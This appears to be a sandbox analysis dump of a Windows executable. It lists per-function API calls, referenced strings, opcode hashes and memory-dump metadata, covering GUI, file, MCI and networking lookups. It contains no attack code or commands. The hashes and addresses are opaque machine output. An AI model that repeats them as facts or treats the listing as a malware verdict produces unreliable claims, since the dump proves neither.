                      • __fread_nolock.LIBCMT ref: 00452D78
                      Similarity
                      • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                      • String ID:
                      • API String ID: 2054058615-0
                      • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                      • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                      • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                      • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                      APIs
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                      Strings
                      Similarity
                      • API ID: Window
                      • String ID: 0
                      • API String ID: 2353593579-4108050209
                      • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                      • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                      • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                      • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                      APIs
                      • GetSysColor.USER32(0000000F), ref: 0044A05E
                      • GetClientRect.USER32(?,?), ref: 0044A0D1
                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                      • GetWindowDC.USER32(?), ref: 0044A0F6
                      • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                      • ReleaseDC.USER32(?,?), ref: 0044A11B
                      • GetSysColor.USER32(0000000F), ref: 0044A131
                      • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                      • GetSysColor.USER32(0000000F), ref: 0044A14F
                      • GetSysColor.USER32(00000005), ref: 0044A15B
                      • GetWindowDC.USER32(?), ref: 0044A1BE
                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                      • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                      • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                      • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                      • ReleaseDC.USER32(?,00000000), ref: 0044A229
                      • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                      • GetSysColor.USER32(00000008), ref: 0044A265
                      • SetTextColor.GDI32(?,00000000), ref: 0044A270
                      • SetBkMode.GDI32(?,00000001), ref: 0044A282
                      • GetStockObject.GDI32(00000005), ref: 0044A28A
                      Similarity
                      • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                      • String ID:
                      • API String ID: 1744303182-0
                      • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                      • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                      • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                      • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                      APIs
                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                      • __mtterm.LIBCMT ref: 00417C34
                        • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                        • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                        • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                      • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                      • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                      • __init_pointers.LIBCMT ref: 00417CE6
                      • __calloc_crt.LIBCMT ref: 00417D54
                      • GetCurrentThreadId.KERNEL32 ref: 00417D80
                      Strings
                      Similarity
                      • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                      • API String ID: 4163708885-3819984048
                      • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                      • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                      • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                      • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                      APIs
                      Strings
                      Similarity
                      • API ID: __wcsicoll$IconLoad
                      • String ID: blank$info$question$stop$warning
                      • API String ID: 2485277191-404129466
                      • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                      • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                      • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                      • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                      APIs
                      • LoadIconW.USER32(?,00000063), ref: 0045464C
                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                      • SetWindowTextW.USER32(?,?), ref: 00454678
                      • GetDlgItem.USER32(?,000003EA), ref: 00454690
                      • SetWindowTextW.USER32(00000000,?), ref: 00454697
                      • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                      • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                      • GetWindowRect.USER32(?,?), ref: 004546F5
                      • SetWindowTextW.USER32(?,?), ref: 00454765
                      • GetDesktopWindow.USER32 ref: 0045476F
                      • GetWindowRect.USER32(00000000), ref: 00454776
                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                      • GetClientRect.USER32(?,?), ref: 004547D2
                      • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                      • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                      Similarity
                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                      • String ID:
                      • API String ID: 3869813825-0
                      • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                      • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                      • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                      • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                      APIs
                      • _wcslen.LIBCMT ref: 00464B28
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                      • _wcslen.LIBCMT ref: 00464C28
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                      • _wcslen.LIBCMT ref: 00464CBA
                      • _wcslen.LIBCMT ref: 00464CD0
                      • _wcslen.LIBCMT ref: 00464CEF
                      Strings
                      Similarity
                      • API ID: _wcslen$Directory$CurrentSystem
                      • String ID: D
                      • API String ID: 1914653954-2746444292
                      • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                      • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                      • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                      • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                      APIs
                      • _wcsncpy.LIBCMT ref: 0045CE39
                      • __wsplitpath.LIBCMT ref: 0045CE78
                      • _wcscat.LIBCMT ref: 0045CE8B
                      • _wcscat.LIBCMT ref: 0045CE9E
                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                      • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                      • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                      • _wcscpy.LIBCMT ref: 0045CF61
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                      Strings
                      Similarity
                      • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                      • String ID: *.*
                      • API String ID: 1153243558-438819550
                      • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                      • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                      • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                      • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                      APIs
                      Strings
                      Similarity
                      • API ID: __wcsicoll
                      • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                      • API String ID: 3832890014-4202584635
                      • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                      • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                      • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                      • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                      APIs
                      • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                      • GetFocus.USER32 ref: 0046A0DD
                      • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                      Strings
                      Similarity
                      • API ID: MessagePost$CtrlFocus
                      • String ID: 0
                      • API String ID: 1534620443-4108050209
                      • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                      • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                      • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                      • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                      APIs
                      • DestroyWindow.USER32(?), ref: 004558E3
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                      Strings
                      Similarity
                      • API ID: Window$CreateDestroy
                      • String ID: ,$tooltips_class32
                      • API String ID: 1109047481-3856767331
                      • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                      • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                      • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                      • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                      APIs
                      • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                      • GetMenuItemCount.USER32(?), ref: 00468C45
                      • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                      • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                      • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                      • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                      • GetMenuItemCount.USER32 ref: 00468CFD
                      • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                      • GetCursorPos.USER32(?), ref: 00468D3F
                      • SetForegroundWindow.USER32(?), ref: 00468D49
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                      • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                      Strings
                      Similarity
                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                      • String ID: 0
                      • API String ID: 1441871840-4108050209
                      • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                      • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                      • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                      • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                      • __swprintf.LIBCMT ref: 00460915
                      • __swprintf.LIBCMT ref: 0046092D
                      • _wprintf.LIBCMT ref: 004609E1
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                      Strings
                      Similarity
                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                      • API String ID: 3631882475-2268648507
                      • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                      • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                      • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                      • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                      APIs
                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                      • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                      • SendMessageW.USER32 ref: 00471740
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                      • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                      • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                      • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                      • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                      • SendMessageW.USER32 ref: 0047184F
                      • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                      • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                      Similarity
                      • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                      • String ID:
                      • API String ID: 4116747274-0
                      • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                      • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                      • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                      • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                      APIs
                      • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                      • _wcslen.LIBCMT ref: 00461683
                      • __swprintf.LIBCMT ref: 00461721
                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                      • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                      • GetDlgCtrlID.USER32(?), ref: 00461869
                      • GetWindowRect.USER32(?,?), ref: 004618A4
                      • GetParent.USER32(?), ref: 004618C3
                      • ScreenToClient.USER32(00000000), ref: 004618CA
                      • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                      Strings
                      Similarity
                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                      • String ID: %s%u
                      • API String ID: 1899580136-679674701
                      • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                      • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                      • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                      • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                      APIs
                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                      • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                      • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                      Strings
                      Similarity
                      • API ID: InfoItemMenu$Sleep
                      • String ID: 0
                      • API String ID: 1196289194-4108050209
                      • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                      • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                      • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                      • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                      APIs
                      • GetDC.USER32(00000000), ref: 0043143E
                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                      • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                      • SelectObject.GDI32(00000000,?), ref: 00431466
                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                      • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                      Strings
                      Similarity
                      • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                      • String ID: (
                      • API String ID: 3300687185-3887548279
                      • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                      • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                      • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                      • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                      APIs
                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                      • GetDriveTypeW.KERNEL32 ref: 0045DB32
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      Strings
                      Similarity
                      • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                      • API String ID: 1976180769-4113822522
                      • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                      • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                      • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                      • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                      APIs
                      Similarity
                      • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                      • String ID:
                      • API String ID: 461458858-0
                      • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                      • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                      • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                      • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                      APIs
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                      • GlobalLock.KERNEL32(00000000), ref: 004300F6
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                      • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                      • CloseHandle.KERNEL32(00000000), ref: 00430113
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                      • GlobalFree.KERNEL32(00000000), ref: 00430150
                      • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                      • DeleteObject.GDI32(?), ref: 004301D0
                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                      Similarity
                      • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                      • String ID:
                      • API String ID: 3969911579-0
                      • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                      • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                      • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                      • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                      APIs
                      Strings
                      Similarity
                      • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                      • String ID: 0
                      • API String ID: 956284711-4108050209
                      • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                      • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                      • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                      • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                      APIs
                      Strings
                      Similarity
                      • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                      • String ID: 0.0.0.0
                      • API String ID: 1965227024-3771769585
                      • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                      • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                      • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                      • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                      APIs
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                      Strings
                      Similarity
                      • API ID: SendString$_memmove_wcslen
                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                      • API String ID: 369157077-1007645807
                      • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                      • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                      • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                      • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                      APIs
                      • GetParent.USER32 ref: 00445BF8
                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                      • __wcsicoll.LIBCMT ref: 00445C33
                      • __wcsicoll.LIBCMT ref: 00445C4F
                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                      Strings
                      Similarity
                      • API ID: __wcsicoll$ClassMessageNameParentSend
                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                      • API String ID: 3125838495-3381328864
                      • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                      • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                      • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                      • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                      APIs
                      • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                      • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                      • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                      • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                      • SendMessageW.USER32(?,00000402,?), ref: 00449399
                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
